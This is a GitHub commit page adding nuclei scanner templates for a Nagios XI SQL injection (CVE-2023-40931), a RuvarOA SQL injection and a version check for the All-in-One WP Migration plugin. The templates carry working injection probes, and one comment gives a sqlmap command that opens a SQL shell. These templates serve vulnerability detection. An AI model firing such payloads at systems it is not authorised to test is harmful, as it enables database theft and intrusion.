Skip to content

Commit

Permalink
20241028
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Oct 28, 2024
1 parent a1a3429 commit e6b6301
Show file tree
Hide file tree
Showing 6 changed files with 242 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20241027
20241028
4 changes: 4 additions & 0 deletions poc.txt
Original file line number Diff line number Diff line change
Expand Up @@ -28738,6 +28738,7 @@
./poc/cve/CVE-2023-40681-bcd43f3e48145f66be2bc67cf616a567.yaml
./poc/cve/CVE-2023-40681.yaml
./poc/cve/CVE-2023-40779.yaml
./poc/cve/CVE-2023-40931.yaml
./poc/cve/CVE-2023-4109-0063ef5aafbc239d0ec2a8c5031199be.yaml
./poc/cve/CVE-2023-4109.yaml
./poc/cve/CVE-2023-4110.yaml
Expand Down Expand Up @@ -44693,6 +44694,7 @@
./poc/cve/CVE-2024-9156.yaml
./poc/cve/CVE-2024-9161-7df3ec5d46908dca2a1515693ac69f54.yaml
./poc/cve/CVE-2024-9161.yaml
./poc/cve/CVE-2024-9162-dcfa27f954fffe01a3cc58b701a4304f.yaml
./poc/cve/CVE-2024-9169-f28b64870e010b6c9a9192d27b27621e.yaml
./poc/cve/CVE-2024-9169.yaml
./poc/cve/CVE-2024-9172-dd6c762e4dc7b5869543b2ed92be27e1.yaml
Expand Down Expand Up @@ -76883,6 +76885,7 @@
./poc/other/TVE-2024-105272050.yaml
./poc/other/TVE-2024-105272055.yaml
./poc/other/TVE-2024-105272110.yaml
./poc/other/TVE-2024-105272120.yaml
./poc/other/TVE-2024-105272125.yaml
./poc/other/TVE-2024-105272130.yaml
./poc/other/TVE-2024-105272140.yaml
Expand Down Expand Up @@ -128293,6 +128296,7 @@
./poc/wordpress/all-in-one-wp-migration-40d498bb215a53af77b045b1c1b53b98.yaml
./poc/wordpress/all-in-one-wp-migration-42b8cf23786a3bbe3e3114e6f8c77428.yaml
./poc/wordpress/all-in-one-wp-migration-4f5aab84211dafc2157dba34e6995f87.yaml
./poc/wordpress/all-in-one-wp-migration-5e3bb756cdfed072ba6289d58365e320.yaml
./poc/wordpress/all-in-one-wp-migration-7318fc4fa3760012c7c692c7105ac59b.yaml
./poc/wordpress/all-in-one-wp-migration-80b4c5ef73752cc8d2d39fcf966258fb.yaml
./poc/wordpress/all-in-one-wp-migration-a9948b43f2084d190b6d2c7fe8682a33.yaml
Expand Down
77 changes: 77 additions & 0 deletions poc/cve/CVE-2023-40931.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,77 @@
id: CVE-2023-40931

info:
name: Nagios XI v5.11.0 - SQL Injection
author: ritikchaddha
severity: medium
description: |
A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php.
impact: |
Successful exploitation of this vulnerability allows an authenticated attackers to execute arbitrary SQL commands.
remediation: |
Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability.
reference:
- https://rootsecdev.medium.com/notes-from-the-field-exploiting-nagios-xi-sql-injection-cve-2023-40931-9d5dd6563f8c
- https://nvd.nist.gov/vuln/detail/CVE-2023-40931
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2023-40931
cwe-id: CWE-89
epss-score: 0.00208
epss-percentile: 0.59103
cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: nagios
product: nagios_xi
shodan-query: title:"Nagios XI"
fofa-query: app="nagios-xi"
google-query: intitle:"nagios xi"
tags: cve2023,cve,authenticated,nagiosxi,sqli,nagios

http:
- raw:
- |
GET /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}
- |
POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=acknowledge_banner_message&id=*
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Failed to acknowledge"
- "SQL Error"
- "right syntax to use near"
condition: and

- type: status
status:
- 200

extractors:
- type: regex
name: nsp
part: body
group: 1
regex:
- "name=['\"]nsp['\"] value=['\"](.*)['\"]>"
internal: true

# digest: 4a0a00473045022100eaedc676d34f68f9a9a22fc03718775356d34be1a378b3357b5635b2fe881edf022072000ae329286b87e05098a88d3a135a1458d3cefafbe5ac6196122f41dccddc:922c64590222798bb761d5b6d8e72950
59 changes: 59 additions & 0 deletions poc/cve/CVE-2024-9162-dcfa27f954fffe01a3cc58b701a4304f.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: CVE-2024-9162-dcfa27f954fffe01a3cc58b701a4304f

info:
name: >
All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary PHP Code Injection
author: topscoder
severity: low
description: >
The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to arbitrary PHP Code Injection due to missing file type validation during the export in all versions up to, and including, 7.86. This makes it possible for authenticated attackers, with Administrator-level access and above, to create an export file with the .php extension on the affected site's server, adding an arbitrary PHP code to it, which may make remote code execution possible.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d97c3379-56c9-4261-9a70-3119ec121a40?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2024-9162
metadata:
fofa-query: "wp-content/plugins/all-in-one-wp-migration/"
google-query: inurl:"/wp-content/plugins/all-in-one-wp-migration/"
shodan-query: 'vuln:CVE-2024-9162'
tags: cve,wordpress,wp-plugin,all-in-one-wp-migration,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "all-in-one-wp-migration"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 7.86')
42 changes: 42 additions & 0 deletions poc/other/TVE-2024-105272120.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,42 @@
id: 2024-105272120

info:
name: RuvarOA协同办公平台 WorkPlanAttachDownLoad SQL注入漏洞
author: k3ppf0r
severity: high
description: |
RuvarOA协同办公平台 WorkPlanAttachDownLoad SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
reference:
- https://blog.csdn.net/qq_41904294/article/details/138723401
remediation: |
升级RuvarOA到高版本
classification:
cve-id: 2024-105272120
cvss-score: 7.8
cwe-id: CWE-89
metadata:
date: 2024-05-11
version: RuvarOA V6.01 、RuvarOA V12.01
fofa-query: body="txt_admin_key"
tags: sqli,RuvarOA,leak

# python sqlmap.py -u "http://xxxx?id=1*" --sql-shell


http:
- raw:
- |
@timeout: 10s
GET /WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Connection: close

stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
condition: and

Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: all-in-one-wp-migration-5e3bb756cdfed072ba6289d58365e320

info:
name: >
All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary PHP Code Injection
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d97c3379-56c9-4261-9a70-3119ec121a40?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/all-in-one-wp-migration/"
google-query: inurl:"/wp-content/plugins/all-in-one-wp-migration/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,all-in-one-wp-migration,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "all-in-one-wp-migration"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 7.86')

0 comments on commit e6b6301

Please sign in to comment.